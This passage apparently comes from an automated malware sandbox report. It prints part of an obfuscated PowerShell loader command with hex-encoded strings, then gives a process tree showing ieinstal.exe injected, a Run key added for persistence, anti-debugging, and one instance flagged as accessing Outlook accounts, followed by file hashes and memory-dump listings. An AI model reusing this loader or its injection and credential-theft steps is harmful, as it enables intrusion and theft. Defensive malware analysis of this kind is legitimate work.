'1E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B082437362D2429187F7F062A353C6D61102B2120372337242B2E20372C2B2220372B2036696573727D706965610B24312D242B242029696561222A2E24373127242B202B366C';Ensnarled9 $Craniom1;$Craniom2 = HTB '612A332037202924272A37243120216578651E163C363120286B17302B312C28206B0C2B3120372A35162037332C2620366B082437362D2429187F7F0220310120292022243120032A3703302B26312C2A2B152A2C2B3120376D6111242E2A2337202B207669656D02011165056D1E0C2B3115313718691E0C2B31153137186C656D1E132A2C21186C6C6C';Ensnarled9 $Craniom2;$Craniom3 = HTB '612A332037202924272A37243120216B0C2B332A2E206D610B24312D242B2420296961162437262A35292436317471726C';Ensnarled9 $Craniom3#"3⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"4⤵
- Checks QEMU agent file
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vmhdwncwsnuhffqtwbtkprw"5⤵
- Suspicious behavior: EnumeratesProcesses
PID:680 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gomvxgmqgvmmplmxnmolawrsuq"5⤵
- Accesses Microsoft Outlook accounts
PID:1460 -
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe" /stext "C:\Users\Admin\AppData\Local\Temp\iiroxyxsudersrabwwafdjlbvxgio"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:760
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\vmhdwncwsnuhffqtwbtkprwFilesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
memory/680-88-0x0000000000476274-mapping.dmp
-
memory/680-95-0x0000000000400000-0x0000000000478000-memory.dmpFilesize
480KB
-
memory/760-94-0x0000000000400000-0x0000000000424000-memory.dmpFilesize
144KB
-
memory/760-92-0x0000000000422206-mapping.dmp
-
memory/900-54-0x000007FEFC371000-0x000007FEFC373000-memory.dmpFilesize
8KB
-
memory/948-58-0x000007FEF3E50000-0x000007FEF49AD000-memory.dmpFilesize
11.4MB
-
memory/948-60-0x000000001B760000-0x000000001BA5F000-memory.dmpFilesize
3.0MB
-
memory/948-85-0x00000000026EB000-0x000000000270A000-memory.dmpFilesize
124KB
-
memory/948-63-0x00000000026EB000-0x000000000270A000-memory.dmpFilesize
124KB
-
memory/948-59-0x00000000026E4000-0x00000000026E7000-memory.dmpFilesize
12KB
-
memory/948-66-0x00000000026E4000-0x00000000026E7000-memory.dmpFilesize
12KB
-
memory/948-57-0x000007FEF49B0000-0x000007FEF53D3000-memory.dmpFilesize
10.1MB
-
memory/948-55-0x0000000000000000-mapping.dmp
-
memory/1136-81-0x0000000077CD0000-0x0000000077E50000-memory.dmpFilesize
1.5MB
-
memory/1136-84-0x0000000077CD0000-0x0000000077E50000-memory.dmpFilesize
1.5MB
-
memory/1136-73-0x0000000077CD0000-0x0000000077E50000-memory.dmpFilesize
1.5MB
-
memory/1136-74-0x0000000077CD0000-0x0000000077E50000-memory.dmpFilesize
1.5MB
-
memory/1136-61-0x0000000000000000-mapping.dmp
-
memory/1136-62-0x0000000075921000-0x0000000075923000-memory.dmpFilesize
8KB
-
memory/1136-67-0x0000000073BE0000-0x000000007418B000-memory.dmpFilesize
5.7MB
-
memory/1136-65-0x0000000005050000-0x0000000005150000-memory.dmpFilesize
1024KB
-
memory/1136-64-0x0000000073BE0000-0x000000007418B000-memory.dmpFilesize
5.7MB
-
memory/1136-82-0x0000000077CD0000-0x0000000077E50000-memory.dmpFilesize
1.5MB
-
memory/1136-72-0x0000000077AF0000-0x0000000077C99000-memory.dmpFilesize
1.7MB
-
memory/1460-98-0x0000000000400000-0x0000000000457000-memory.dmpFilesize
348KB
-
memory/1460-97-0x0000000000400000-0x0000000000457000-memory.dmpFilesize
348KB
-
memory/1460-89-0x0000000000455238-mapping.dmp
-
memory/1480-75-0x00000000001F0000-0x00000000002F0000-memory.dmpFilesize
1024KB
-
memory/1480-87-0x0000000077CD0000-0x0000000077E50000-memory.dmpFilesize
1.5MB
-
memory/1480-86-0x0000000077AF0000-0x0000000077C99000-memory.dmpFilesize
1.7MB
-
memory/1480-83-0x00000000001F0000-0x00000000002F0000-memory.dmpFilesize
1024KB
-
memory/1480-80-0x0000000077CD0000-0x0000000077E50000-memory.dmpFilesize
1.5MB
-
memory/1480-79-0x0000000077AF0000-0x0000000077C99000-memory.dmpFilesize
1.7MB
-
memory/1480-71-0x00000000001F0000-mapping.dmp
-
memory/1480-70-0x00000000001F0000-0x00000000002F0000-memory.dmpFilesize
1024KB